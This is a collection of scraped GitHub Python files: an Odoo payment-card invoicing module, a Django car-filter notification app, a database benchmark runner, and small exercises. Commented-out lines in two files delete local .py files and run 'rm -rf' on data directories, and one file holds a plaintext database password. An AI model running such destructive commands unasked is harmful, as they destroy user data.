parsed_inv\n\n @api.model\n def _rotate_image(self, image_binary):\n image_original_file = io.BytesIO()\n image_original_file.write(image_binary)\n original_image = Image.open(image_original_file)\n rotated_image = ImageOps.exif_transpose(original_image)\n rotated_image_file = io.BytesIO()\n rotated_image.save(rotated_image_file, format='JPEG')\n rotated_image_binary = rotated_image_file.getvalue()\n return rotated_image_binary\n\n def check_existing_invoice(self):\n assert self.invoice_id\n # should not happen because domain blocks that\n if self.invoice_id.currency_id != self.company_currency_id:\n raise UserError(_(\n \"For the moment, we don't support linking to an invoice \"\n \"in another currency than the company currency.\"))\n # should not happen because domain blocks that\n if self.invoice_id.payment_state != 'not_paid':\n raise UserError(_(\n \"The transaction %s is linked to invoice %s \"\n \"which is not in unpaid state.\")\n % (self.name, self.invoice_id.number))\n # should not happen because domain blocks that\n if self.invoice_id.move_type not in ('in_invoice', 'in_refund'):\n raise UserError(_(\n \"The transaction %s is linked to invoice %s \"\n \"which is not a supplier invoice/refund!\")\n % (self.name, self.invoice_id.name))\n # handled by onchange\n if self.partner_id != self.invoice_id.commercial_partner_id:\n raise UserError(_(\n \"The transaction %s is linked to partner '%s' \"\n \"whereas the related invoice %s is linked to \"\n \"partner '%s'.\") % (\n self.name, self.partner_id.display_name,\n self.invoice_id.display_name,\n self.invoice_id.commercial_partner_id.display_name))\n # TODO handle partial payments ?\n if self.company_currency_id.compare_amounts(\n self.invoice_id.amount_total_signed,\n self.total_company_currency):\n raise UserError(_(\n \"The transaction %s is linked to the \"\n \"invoice/refund %s whose total amount is %s, \"\n \"but the amount of the transaction is %s.\") % (\n self.name, self.invoice_id.name,\n format_amount(\n self.env,\n self.invoice_id.amount_total_signed * -1,\n self.invoice_id.currency_id),\n format_amount(\n self.env, self.total_company_currency, self.company_currency_id),\n ))\n\n def _prepare_invoice_import_config(self):\n self.ensure_one()\n if not self.expense_account_id:\n raise UserError(_(\n \"Missing expense account on transaction %s.\") % self.name)\n import_config = {\n 'invoice_line_method': 'nline_no_product',\n 'account': self.expense_account_id,\n 'analytic_distribution': self.analytic_distribution or False,\n }\n return import_config\n\n def generate_invoice(self):\n self.ensure_one()\n assert self.transaction_type == 'expense', 'wrong transaction type'\n aiio = self.env['account.invoice.import']\n parsed_inv = self._prepare_invoice_import()\n logger.debug('Payment card invoice import parsed_inv=%s', parsed_inv)\n parsed_inv = aiio.pre_process_parsed_inv(parsed_inv)\n import_config = self._prepare_invoice_import_config()\n invoice = aiio.create_invoice(\n parsed_inv, import_config=import_config, origin='Mooncard connector')\n invoice.message_post(\n body=_(\"Invoice created from payment card transaction %s.\")\n % self.name)\n invoice.with_context(validate_analytic=True)._post(soft=False)\n assert self.company_currency_id.compare_amounts(\n invoice.amount_tax, abs(self.vat_company_currency)) == 0, 'bug on VAT'\n return invoice\n\n def reconcile(self, bank_move, invoice):\n self.ensure_one()\n assert self.bank_counterpart_account_id\n assert bank_move\n assert invoice\n assert not self.reconcile_id, 'already has a reconcile mark'\n movelines_to_rec = self.env['account.move.line'].search([\n ('move_id', '=', bank_move.id),\n ('account_id', '=', self.bank_counterpart_account_id.id),\n ], limit=1)\n for line in invoice.line_ids:\n if line.account_id == self.bank_counterpart_account_id:\n movelines_to_rec += line\n movelines_to_rec.reconcile()\n return movelines_to_rec[0].full_reconcile_id\n\n @api.model\n def _prepare_import_speeddict(self, company):\n \"\"\"Used in provided-specific modules\"\"\"\n bdio = self.env['business.document.import']\n speeddict = {\n 'tokens': {}, 'accounts': {}, 'analytic': {},\n 'countries': {}, 'currencies': {}, 'mapping': {}}\n\n token_res = self.env['newgen.payment.card'].search_read(\n [('company_id', '=', company.id)], ['name'])\n for token in token_res:\n speeddict['tokens'][token['name']] = token['id']\n\n speeddict['accounts'] = bdio._prepare_account_speed_dict()\n\n analytic_res = self.env['account.analytic.account'].search_read(\n [('company_id', '=', company.id), ('code', '!=', False)], ['code'])\n for analytic in analytic_res:\n analytic_code = analytic['code'].strip().lower()\n speeddict['analytic'][analytic_code] = analytic['id']\n\n countries = self.env['res.country'].search_read(\n [('code', '!=', False)], ['code'])\n for country in countries:\n speeddict['countries'][country['code'].strip()] = country['id']\n speeddict['eu_country_ids'] = self.env.ref('base.europe').country_ids.ids\n if not company.country_id.id:\n raise UserError(_(\n \"Country is not set on company '%s'.\") % company.display_name)\n speeddict['my_country_id'] = company.country_id.id\n\n currencies = self.env['res.currency'].with_context(\n active_test=False).search_read([], ['name'])\n for curr in currencies:\n speeddict['currencies'][curr['name']] = curr['id']\n npcto = self.env['newgen.payment.card.transaction']\n map_res = self.env['newgen.payment.card.account.mapping'].search_read(\n [('company_id', '=', company.id)])\n for map_entry in map_res:\n speeddict['mapping'][\n (map_entry['card_id'][0],\n map_entry['expense_account_id'][0])] =\\\n map_entry['force_expense_account_id'][0]\n if not company.transfer_account_id:\n raise UserError(_(\n \"Missing 'Internal Bank Transfer Account' on company '%s'.\")\n % company.display_name)\n speeddict['transfer_account_id'] = company.transfer_account_id.id\n default_partner = self._default_partner(raise_if_not_found=True)\n if default_partner.parent_id:\n raise UserError(_(\n \"The default partner (%s) should be a parent partner.\")\n % default_partner.display_name)\n speeddict['default_partner_id'] = default_partner.id\n speeddict['partner_labels'] = {}\n specific_partner_existing_transactions = npcto.search_read([\n ('state', '=', 'done'),\n ('transaction_type', '=', 'expense'),\n ('vendor', '!=', False),\n ('partner_id', '!=', False),\n ('partner_id', '!=', speeddict['default_partner_id'])],\n ['vendor', 'partner_id'], order='id')\n # order by id to have the latest value for a particular label\n for trans in specific_partner_existing_transactions:\n label = unidecode(trans['vendor']).strip().upper()\n speeddict['partner_labels'][label] = trans['partner_id'][0]\n speeddict['partner_vat'] = {}\n speeddict['partner_names'] = {}\n partners = self.env['res.partner'].search_read(\n [('parent_id', '=', False), ('id', '!=', company.partner_id.id)],\n ['name', 'vat'])\n for partner in partners:\n partner_name = unidecode(partner['name'].strip().upper())\n if len(partner_name) >= MEANINGFUL_PARTNER_NAME_MIN_SIZE:\n speeddict['partner_names'][partner_name] = partner['id']\n if partner['vat']:\n # 'vat' field is already sanitized\n speeddict['partner_vat'][partner['vat']] = partner['id']\n speeddict['default_vat_rate'] = 0\n if (\n company.account_purchase_tax_id and\n company.account_purchase_tax_id.amount_type == 'percent' and\n float_compare(\n company.account_purchase_tax_id.amount, 0,\n precision_digits=4) > 0):\n speeddict['default_vat_rate'] =\\\n company.account_purchase_tax_id.amount\n return speeddict\n","repo_name":"akretion/odoo-mooncard-connector","sub_path":"base_newgen_payment_card/models/newgen_payment_card_transaction.py","file_name":"newgen_payment_card_transaction.py","file_ext":"py","file_size_in_byte":28978,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"91"}
+{"seq_id":"16306750259","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nPV = 491.4\nUR = 0.1666\nd = 0.008\nSMP = 100\nREC = 50\nr = 0.045\n\ninput_year_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,\n 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,\n 21, 22, 23, 24, 25, 26, 27, 28, 29, 30,\n 31, 32, 33, 34, 35]\nBenefit = []\n\nprint(input_year_list)\nprint(input_year_list[0])\n\nfor i in input_year_list:\n def func_formulaA(input_year):\n sum = 0\n for n in range(0, input_year + 1):\n formulaD = math.pow(1 - d, n)\n formulaR = math.pow(1 + r, n)\n sum += (UR * formulaD * (SMP + REC) / formulaR)\n return sum\n\n formulaA = func_formulaA(i)\n Result = PV * 8760 * formulaA\n Benefit.append(Result/100000)\n\nprint('\\n')\nprint(Benefit[0])\nprint(Benefit[1])\nprint(Benefit[2])\nprint(Benefit[3])\nprint(Benefit[4])\nprint(Benefit[5])\nprint(Benefit[6])\nprint(Benefit[7])\n\n'''\nx = np.arange(8)\nplt.bar(x, Benefit)\nplt.xticks(x, input_year_list)\n\nplt.show()\n'''\nplt.plot(input_year_list, Benefit)\nplt.show()\n","repo_name":"JiHyun5990/Project2_Profit-solar","sub_path":"test04_총수익 그래프(5년).py","file_name":"test04_총수익 그래프(5년).py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"11302110005","text":"\nclass DataField(object):\n name = \"\"\n inputFields = []\n def __init__(self,name,inputFields):\n self.name = name\n self.inputFields = inputFields\n print('Init Field: ' + str(self.name))\n def isFieldDefined(self,definedFieldNames):\n for field in definedFieldNames:\n if field == self.name: return True\n return False\n\ndef isFieldDefined(fieldName,definedFieldNames):\n for defField in definedFieldNames:\n if defField == fieldName: return True\n return False \n\nclass ConditionParameter(object):\n name = \"\"\n inputFields = []\n def __init__(self,name,inputFields):\n self.name = name\n self.inputFields = inputFields\n\ndef initInputFields(data,inputFields):\n modData = data\n for field in inputFields:\n definedFields = data.columns\n if not isFieldDefined(field.name,definedFields):\n modData = initInputFields(modData,field.inputFields)\n print(field.name + ' Created')\n modData = field.createField(modData)\n return modData\n\ndef initializeDataFields(data,inputs):\n for inpt in inputs:\n data = initInputFields(data,inpt.inputFields)\n data = inpt.createField(data)\n return data\n","repo_name":"WasatchFlatlander/oop-data-script","sub_path":"SimBase.py","file_name":"SimBase.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"31459404504","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import include, url\n\nfrom .views import *\n\nurlpatterns = [\n\t#url(r'login', event_login, name='event_login'),\n\turl(r'visitor', add_visitor, name='add_visitor'),\n\turl(r'^register/(?P.+)/participant-info', visitor_registration_participant_information, name='participant_info'),\n\turl(r'^register/(?P.+)/participant-info', visitor_registration_participant_information, name='participant_info'),\n\turl(r'^register/(?P.+)/companion-info', visitor_registration_companion_information, name='companion_info'),\n\turl(r'^register/(?P.+)/events-selector', visitor_registration_events_selector, name='events_selector_visitor'),\n\turl(r'^register/(?P.+)/payment', visitor_registration_payment, name='payment'),\n\turl(r'^register/(?P.+)/send_upn', send_upn, name='send_upn'),\n\turl(r'^payment/(?P.+)/', create_paypal, name='create_paypal'),\n\turl(r'^payment/(?P.+)/execute/', create_paypal, name='paypal_execute'),\n\t]","repo_name":"NewProjectUsername/project","sub_path":"Visitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38342434014","text":"import random\n\nchoiceList = [\"Rock\", \"Scissors\", \"Paper\"]\nuserScore = 0\ncomputerScore = 0\n\nhumanToNumber = {\"R\": 1,\n \"S\": 2,\n \"P\": 3}\nplay = 1\nwhile play > 0:\n userInput = input(\"------------------\\nWrite your Choice\\n1.Rock\\n2.Paper\\n3.Scissors\\nEnter Here:-\")\n userInput = userInput.capitalize()\n\n if userInput in choiceList:\n computerInput = str(random.choice(choiceList))\n print(f\"Computer Chooses:-{computerInput}\")\n computerInput = humanToNumber[computerInput[0]]\n userInput = humanToNumber[userInput[0]]\n\n if userInput == computerInput:\n print(\"------------------\\nTie\\n------------------\")\n elif userInput == (computerInput % 3) + 1:\n print(\"------------------\\nComputer Wins\\n------------------\")\n computerScore += 1\n else:\n print(\"------------------\\nPlayer Wins\\n------------------\")\n userScore += 1\n print(f\"Computer:-{computerScore}\\nPlayer:-{userScore}\")\n\n else:\n print(\"Your input is invalid....\\nPlease enter again!\")\n\n play = int(input(\"------------------\\nTo Exit press 0\\nTo Continue press 1\\nEnter here:-\"))\n\n# Here we take input from the user and convert to a number using humanToNumber Dictionary\n# For random selection of computer, we have created a choiceList List and we select from it using random.choice(choiceList) method\n# For Win/Loss logic we are using arithmetic operator(%) modulo.\n# To understand this logic visit https://therenegadecoder.com/code/rock-paper-scissors-using-modular-arithmetic/#the-modular-arithmetic-minimalist\n","repo_name":"arhamshah/PythonBasicProjects","sub_path":"P3-RockPaperScissors.py","file_name":"P3-RockPaperScissors.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"15321249923","text":"import os,glob\n# print(os.listdir())\n# for f in os.listdir():\n# if f.endswith('.py'):\n# os.remove(f)\n# print(glob.glob('*')\n# print(d['abc'])\n# s='a'\n# print(int(s))\n# print(10/0)i\n# import pymysql\n# coon = pymysql.connect(host='118.24.3.40',user='jxz',\n# password='123456',db='jxz')\n# cur= coon.cursor()\n# cur.execute('select from a;')\n#\n# for i in range(20):\n# print(i)\n\n# try:\n# s = 10/0\n# except ZeroDivisionError as e:\n# # except ZeroDivisionError, e: 这个是python2里面的写法\n# print('走这里')\n# print(e)\n\ndef calc(a,b):\n try:\n res = a/b\n # except ZeroDivisionError as e:\n # res = '除数不能为零, %s'%e\n # except TypeError as e:\n # res = '类型错误,只能数字类型 %s'%e\n except Exception as e:\n print(e)\n # return res\n# res = calc('k',1) #TypeError\n# # calc(10,0) # ZeroDivisionError\n# res = calc(10,0) #TypeError\n\n\nmoney = input('enter:')\ntry:\n money = int(money)\nexcept Exception as e:#产生异常了,走这边\n print('输入金额错误!')\nelse:#没有出现异常的话就这里\n print(money+1)\nfinally:\n print('什么时候执行finally')\n\n# sssk\n# 689\n\n","repo_name":"Zzhard/jnz","sub_path":"day11/呵呵呵.py","file_name":"呵呵呵.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2321555842","text":"from behave import *\nimport time\nfrom time import sleep\n#from os import system as run\nfrom subprocess import call as run\nfrom subprocess import Popen, PIPE, STDOUT\n\n#DB = 'aerospike'\nDB = 'infinispan'\n\nlog_file = '/local/logs/out.log'\n\nSMP = 10\nPROCS = {\n\t'aerospike': 'asd',\n\t'redis': 'redis-server',\n\t'infinispan': 'java',\n\t'cassandra': 'java'\n}\nWARMUPS = {\n\t'aerospike': 0.05,\n\t'redis': 1.7,\n\t'infinispan': 0.05,\n\t'cassandra': 0.05\n}\nMAX_TPS = {\n\t'aerospike': {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 500000,\n\t\t\t'1k_w100': 500000\n\t\t},\n\t\t'5k': {\n\t\t\t'1k_r100': 250000,\n\t\t\t'1k_r50w50': 250000,\n\t\t\t'1k_w100': 250000\n\t\t},\n\t\t'32k': {\n\t\t\t'1k_r100': 50000,\n\t\t\t'1k_r50w50': 50000,\n\t\t\t'1k_w100': 50000\n\t\t}\n\t},\n\t'redis' : {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 500000,\n\t\t\t'1k_w100': 500000\n\t\t},\n\t\t'5k': {\n\t\t\t'1k_r100': 250000,\n\t\t\t'1k_r50w50': 250000,\n\t\t\t'1k_w100': 250000\n\t\t},\n\t\t'32k': {\n\t\t\t'1k_r100': 50000,\n\t\t\t'1k_r50w50': 50000,\n\t\t\t'1k_w100': 50000\n\t\t}\n\t},\n\t'infinispan': {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 100000,\n\t\t\t'1k_w100': 50000\n\t\t},\n\t\t'5k': {\n\t\t\t'5k_r100': 250000,\n\t\t\t'5k_r50w50': 50000,\n\t\t\t'5k_w100': 50000\n\t\t},\n\t\t'32k': {\n\t\t\t'32k_r100': 50000,\n\t\t\t'32k_r50w50': 10000,\n\t\t\t'32k_w100': 10000\n\t\t}\n\t},\n\t'cassandra': {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 100000,\n\t\t\t'1k_w100': 100000\n\t\t},\n\t\t'5k': {\n\t\t\t'5k_r100': 250000,\n\t\t\t'5k_r50w50': 50000,\n\t\t\t'5k_w100': 50000\n\t\t},\n\t\t'32k': {\n\t\t\t'32k_r100': 50000,\n\t\t\t'32k_r50w50': 10000,\n\t\t\t'32k_w100': 10000\n\t\t}\n\t}\n}\nCONFIG = {\n\t'db': DB,\n\t'action': 'run',\n\t'workload': 'a',\n\t'recordcount': 4000000,\n\t'runtime': 3,\n\t'threads': 400,\n\t'target': 0,\n\t'mark': 'baseline',\n\t'save': 'true',\n\t'proc': PROCS[DB],\n\t'nic': 'eth0',\n\t'device': 'vda2',\n}\nCMDS = [\n\t'fab run_test:{action},workload={workload},recordcount={recordcount},runtime={runtime},threads={threads},target={target},mark={mark},save={save} --set db={db}',\n\t'fab monitorit:mark={mark},proc={proc},nic={nic},device={device},duration={runtime},save={save} --set db={db}'\n]\n\n\ndef run_test(config):\n\tprocs = []\n\ttimeout = CONFIG['runtime']*60 + 30\n\twith open(log_file, 'a') as fdout:\n\t\tfor cmd in CMDS:\n\t\t\tcmd = cmd.format(**config)\n\t\t\tp = Popen(cmd, stdout=fdout, stderr=STDOUT, shell=True)\n\t\t\tprint(' '*4 + cmd)\n\t\t\tprint(' '*6 + 'start at: {0}'.format(time.time()))\n\t\t\tprocs.append([p, True, cmd.split(':')[0].split()[-1]])\n\t\t\tsleep(WARMUPS[DB]*60)\n\t\tall_procs = len(procs)\n\t\tdone_procs = 0\n\t\tsleep(CONFIG['runtime']*60)\n\t\tcount = CONFIG['runtime']*60\n\t\twhile done_procs < all_procs:\n\t\t\tsleep(1)\n\t\t\tcount += 1\n\t\t\tfor p in procs:\n\t\t\t\tif p[1] and p[0].poll() is not None:\n\t\t\t\t\tdone_procs += 1\n\t\t\t\t\tp[1] = False\n\t\t\t\t\tprint(' '*6 + '{1} stop at: {0}'.format(time.time(), p[2]))\n\t\t\t\t\t#do something done this process\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\t\tif count > timeout:\n\t\t\t\t\tp[0].terminate()\n\t\t\t\t\tdone_procs += 1\n\t\t\t\t\tp[1] = False\n\t\t\t\t\tprint(' '*6 + '{1} stop at: {0}'.format(time.time(), p[2]))\n\t\t\t\t\tbreak\n\n# steps\n\n@given(u'stop cluster')\ndef step_impl(context):\n\t#run('fab service:{0},stop'.format(DB))\n\tpass\n\n@given(u'clean disk')\ndef step_impl(context):\n\t#run(\"fab remote_run:'rm -rf /local/data/{0}/*'\".format(DB))\n\tpass\n\n@given(u'start cluster')\ndef step_impl(context):\n\tpass\n\n@given(u'cluster is ready')\ndef step_impl(context):\n\tassert True\n\n@when('load data into cluster')\ndef step_impl(context):\n\tassert True\n\n@then('run the baseline cases')\ndef step_impl(context):\n\tconfig = {}\n\tconfig.update(CONFIG)\n\tconfig['runtime'] += WARMUPS[DB]\n\tfor row in context.table:\n\t\tconfig['workload'] = row['workload']\n\t\tprint('running workload: {0}'.format(config['workload']))\n\t\tassert len(context.tags) == 1\n\t\tcase = list(context.tags)[0]\n\t\tmax_tps = MAX_TPS[DB][case][config['workload']]\n\t\tinterval = max_tps/SMP\n\t\tsamples = range(interval, max_tps, interval)\n\t\tsamples.append(max_tps)\n\t\tsamples.append(0)\n\t\tcount = 1\n\t\tfor target in samples:\n\t\t\tconfig['target'] = target\n\t\t\tmark = 'bl_' + config['workload'] + '_' + str(count)\n\t\t\tcount += 1\n\t\t\tconfig['mark'] = mark\n\t\t\tprint(' target TPS: {0}'.format(config['target']))\n\t\t\trun_test(config)\n\t\t\tprint(' '*8 + 'done')\n\t\t\tsleep(10)\n","repo_name":"sanpingz/dbtest","sub_path":"tools/behave/backups/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"5049135224","text":"import pytest\n\nfrom src.argteller.decorators.class_decorator import ArgtellerClassDecorator\n\nsample_dsl1=\"\"\"\nTopic_1\n-param1:option1\n =option1\n -paramA:a\n =option2\n -paramB:b\n\nTopic_2\n-param2:asdf\n\nTopic_3\n-param3:A\n =A\n -Topic_1/param1:option1\n -Topic_1/paramA:value1\n -Topic_2/param2:value1\n =B\n -Topic_1/param1:option2\n -Topic_1/paramB:value2\n -Topic_2/param2:value2\n\"\"\"\n\n@ArgtellerClassDecorator(dsl=sample_dsl1)\nclass TestClass1():\n\n\tdef __init__(self):\n\n\t\tpass\n\ndef test_sample_dsl1():\n\n\ttest = TestClass1()\n\n\tassert test.param1=='option1'\n\tassert test.paramA=='value1'\n\tassert test.param2=='value1'\n\n\nsample_dsl2=\"\"\"\n\nTopic_1\n\n-param1:option1\n =option1\n -paramA:a\n =option2\n -paramB:b\n\nTopic_2\n-param2:1/5\n\nTopic_3\n-param3:A\n =A\n -Topic_1/param1:option1\n -Topic_1/paramA:1/5\n =B\n -Topic_1/param1:option2\n -Topic_1/paramB:value2\n\n\"\"\"\n\n@ArgtellerClassDecorator(dsl=sample_dsl2)\nclass TestClass2():\n\n\tdef __init__(self):\n\n\t\tpass\n\ndef test_sample_dsl2():\n\n\ttest = TestClass2()\n\n\tassert test.paramA==0.2\n\tassert test.param2==0.2\n\n\n\n\n\n","repo_name":"mozjay0619/argteller-viz","sub_path":"tests/test_dsls.py","file_name":"test_dsls.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7488271203","text":"def inorder_tree_walk(x):\n if x != None:\n inorder_tree_walk(x.left)\n print(x.data.a2)\n inorder_tree_walk(x.right)\n\ndef tree_search(x, k):\n if x == None or x.data.a1 == k:\n return x\n if k < x.data.a1:\n return tree_search(x.left, k)\n else:\n return tree_search(x.right, k)\n\ndef tree_minimum(x):\n while x.left != None:\n x = x.left\n return x\n\ndef tree_maximum(x):\n while x.right != None:\n x = x.right\n return x\n\ndef tree_successor(x):\n if x.right != None:\n return tree_minimum(x.right)\n y = x.p\n while y != None and x == y.right:\n x = y\n y = y.p\n return y\n\ndef tree_insert(T, z):\n y = None\n x = T\n while x != None:\n y = x\n if z.data.a1 < x.data.a1:\n x = x.left\n else:\n x = x.right\n z.p = y\n if y == None:\n T = z\n elif z.data.a1 < y.data.a1:\n y.left = z\n else:\n y.right = z\n return T\n\ndef tree_delete(T, z):\n if z.left == None:\n transplant(T, z, z.right)\n elif z.right == None:\n transplant(T, z, z.left)\n else:\n y = tree_minimum(z.right)\n if y.p != z:\n transplant(tree_delete, y, y.right)\n y.right = z.right\n y.right.p = y\n transplant(T, z, y)\n y.left = z.left\n y.left.p = y\n\ndef transplant(T, u, v):\n if u.p == None:\n T = v\n elif u == u.p.left:\n u.p.left = v\n else:\n u.p.right = v\n if v != None:\n v.p = u.p\n\ndef inorder_tree_walk_list(x, l):\n if x != None:\n inorder_tree_walk_list(x.left, l)\n l.append(x.data)\n inorder_tree_walk_list(x.right, l)\n","repo_name":"MilovanTomasevic/com","sub_path":"courses/python/files/vezba05/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37921718012","text":"# coding:utf-8\nimport sys\nimport os\nf = open('input_so.txt', 'r')\nsys.stdin = f\n\nN = int(input())\na = list(map(int,input().split()))\nans = 0\n\nwhile (1):\n for i in range(N):\n if(a[i]%2 == 0):\n a[i] = a[i]/2\n else:\n break\n if(i != N-1):\n break\n else:\n ans += 1\n\nprint(\"{}\".format(ans))\n","repo_name":"arbol962/competitivePrograming","sub_path":"ABS/so.py","file_name":"so.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2616616485","text":"# Atrybuty zarządzane oparte na właściwościach\n\nclass String:\n def __init__(self, name):\n self.name = name\n def __get__(self, instance, cls):\n if instance is None:\n return self\n return instance.__dict__[self.name]\n\n def __set__(self, instance, value):\n if not isinstance(value, str):\n raise TypeError('Oczekiwano łańcucha znaków')\n instance.__dict__[self.name] = value\n\n\nclass Person:\n name = String('name')\n def __init__(self, name):\n self.name = name\n\nclass SubPerson(Person):\n @property\n def name(self):\n print('Pobieranie imienia')\n return super().name\n\n @name.setter\n def name(self, value):\n print('Ustawianie imienia na:', value)\n super(SubPerson, SubPerson).name.__set__(self, value)\n\n @name.deleter\n def name(self):\n print('Usuwanie imienia')\n super(SubPerson, SubPerson).name.__delete__(self)\n\nif __name__ == '__main__':\n a = Person('Gucio')\n print(a.name)\n a.name = 'Dawid'\n print(a.name)\n try:\n a.name = 42\n except TypeError as e:\n print(e)\n","repo_name":"anpadoma/python_receptury3","sub_path":"R08/rozwijanie_właściwości_w_klasie_pochodnej/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33312954469","text":"from datetime import datetime\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Specification\nfrom cars.models import Car\nfrom django.shortcuts import get_object_or_404\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMessage\n\nimport threading\n\n# Create your views here.\n\n@login_required(login_url = 'login')\ndef filterForm(request):\n\n year = [x for x in range(2010,datetime.now().year)]\n\n data = {'years':year}\n return render(request,'notify/carForm.html',data)\n\ndef filterSubmit(request):\n if request.method == 'POST':\n user_id = request.POST['user_id']\n name = request.POST['name']\n email = request.POST['email']\n brand = request.POST['brand']\n model = request.POST['model']\n body_style = request.POST['body_style']\n fuel = request.POST['fuel']\n transmission = request.POST['transmission']\n color = request.POST['color']\n year = request.POST['year']\n milage = request.POST['milage']\n min_price = int(request.POST['min_price'])\n max_price = int(request.POST['max_price'])\n\n\n hasSpecified = Specification.objects.filter(user_id=user_id, brand=brand, model=model, body_style=body_style, fuel=fuel, transmission=transmission, color=color, year=year, milage=milage, min_price=min_price, max_price=max_price).exists()\n\n if hasSpecified:\n messages.error(request, 'You have already made an exact filter request...')\n return redirect('/notify/')\n\n specs = Specification(user_id=user_id, name=name, email=email, brand=brand, model=model, body_style=body_style, fuel=fuel, transmission=transmission, color=color, year=year, milage=milage, min_price=min_price, max_price=max_price)\n specs.save()\n messages.success(request, \"Your filter is submitted and you'll be notified soon\")\n\n return redirect('/accounts/dashboard')\n\n@login_required(login_url = 'login')\ndef foundCar(request,id):\n\n \"got the Specification row from id\"\n specs = get_object_or_404(Specification,pk=id)\n\n cars = Car.objects.order_by('-created_date').filter(sold=False)\n \n filters={}\n if specs.brand:\n filters['Brand']=specs.brand.capitalize()\n cars = cars.filter(brand__icontains=specs.brand)\n if specs.model:\n filters['Model']=specs.model.capitalize()\n cars = cars.filter(car_title__icontains=specs.model)\n if specs.body_style:\n filters['Body']=specs.body_style.capitalize()\n cars = cars.filter(body_style__icontains=specs.body_style)\n if specs.fuel:\n filters['Fuel']=specs.fuel.capitalize()\n cars = cars.filter(fuel_type__icontains=specs.fuel)\n if specs.transmission:\n filters['Transmission']=specs.transmission.capitalize()\n cars = cars.filter(transmission__icontains=specs.transmission)\n if specs.color:\n filters['Color']=specs.color.capitalize()\n cars = cars.filter(color__icontains=specs.color)\n\n filters['Year']=str(specs.year)+' onwards'\n filters['Mileage']=str(specs.milage)+' +'\n filters['Min Price']=specs.min_price\n filters['Max Price']=specs.max_price\n\n \"filtering cars that match the specification\"\n\n data={\n 'name': specs.name,\n 'filter': filters,\n 'cars': cars,\n }\n return render(request, 'notify/filtered_cars.html',data)\n\n\ndef deleteFilter(request, id):\n specification = Specification.objects.get(id = id)\n specification.delete()\n messages.success(request,'You have deleted your Car Filter')\n return redirect('dashboard')\n\n@receiver(post_save, sender=Car)\ndef notifyUser(sender, instance, created, *args, **kwargs):\n def execute_in_thread():\n # received one tuple from the Car model...\n specs = Specification.objects.filter(year__lte=instance.year, milage__lte=instance.milage, min_price__lte=instance.price, max_price__gte=instance.price)\n\n for s in specs:\n if s.brand:\n if s.brand.lower()!=instance.brand.lower():\n continue\n if s.model:\n if s.model.lower() not in instance.car_title.lower():\n continue\n if s.body_style:\n if s.body_style!=instance.body_style:\n continue\n if s.fuel:\n if s.fuel!=instance.fuel_type:\n continue\n if s.transmission:\n if s.transmission!=instance.transmission:\n continue\n if s.color:\n if s.color!=instance.color:\n continue\n \n print('\\n\\nCar Matched to a filter with ID',s.id,'\\n\\n')\n\n user = s.name\n subject = 'Found you your Car'\n data = {\n 'user': user,\n 'car': instance.car_title,\n 'id': s.id,\n }\n message = render_to_string('emailTemplate.html',data)\n\n email = EmailMessage(subject, message, to=[s.email])\n email.content_subtype = 'html'\n email.send()\n\n thread = threading.Thread(target=execute_in_thread)\n thread.start()\n\n \n\n ","repo_name":"codesentry17/thisIsEverything","sub_path":"notify/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
